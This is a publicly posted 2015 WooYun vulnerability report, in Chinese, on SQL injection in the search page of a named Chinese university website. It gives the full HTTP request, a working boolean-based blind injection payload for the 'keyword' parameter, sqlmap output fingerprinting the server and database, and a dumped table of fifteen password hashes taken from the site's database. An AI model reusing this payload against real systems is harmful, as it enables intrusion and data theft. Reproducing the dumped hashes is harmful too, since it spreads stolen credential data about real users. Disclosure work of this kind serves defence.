漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0103166
漏洞标题:国防科技大学某站SQL注入
相关厂商:国防科技大学
漏洞作者: 路人甲
提交时间:2015-03-25 14:10
修复时间:2015-03-30 14:12
公开时间:2015-03-30 14:12
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
POST /search.asp HTTP/1.1
Host: www.nudt.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.nudt.edu.cn/
Cookie: ASPSESSIONIDQSBQTSST=DMBFBLJAMAFLAFPOKIMLGHDO
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
keyword=111&scope=&typeid=0&Submit=%CB%D1+%CB%F7
漏洞证明:
Parameter: keyword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=111%' AND 3512=3512 AND '%'='&scope=&typeid=0&Submit=%CB%D1
%CB%F7
---
[18:55:39] [INFO] testing Microsoft SQL Server
[18:55:39] [INFO] confirming Microsoft SQL Server
[18:55:40] [WARNING] reflective value(s) found and filtering out
[18:55:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
current database: 'Nudt_db'
+------------------+
| Password |
+------------------+
| 032a29d22dbde9bb |
| 3c9e12ecc5d529b3 |
| 49855157b0350839 |
| 49b09978f697d989 |
| 49ba59abbe56e057 |
| 5caf21ee765ff4d1 |
| 78f2f395780c53d0 |
| 7944fe3add32214f |
| 7944fe3add32218f |
| 7f650237c27032e8 |
| 830c6c27b3a81c42 |
| a902616480a17190 |
| c3da1455d1a44982 |
| c9e5eba163010c85 |
| fff7a97ccf3a9c6c |
+------------------+
修复方案:
你们更专业!虽然后台地址只能在内网登陆,但是信息泄露还是不好的。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-03-30 14:12
厂商回复:
最新状态:
暂无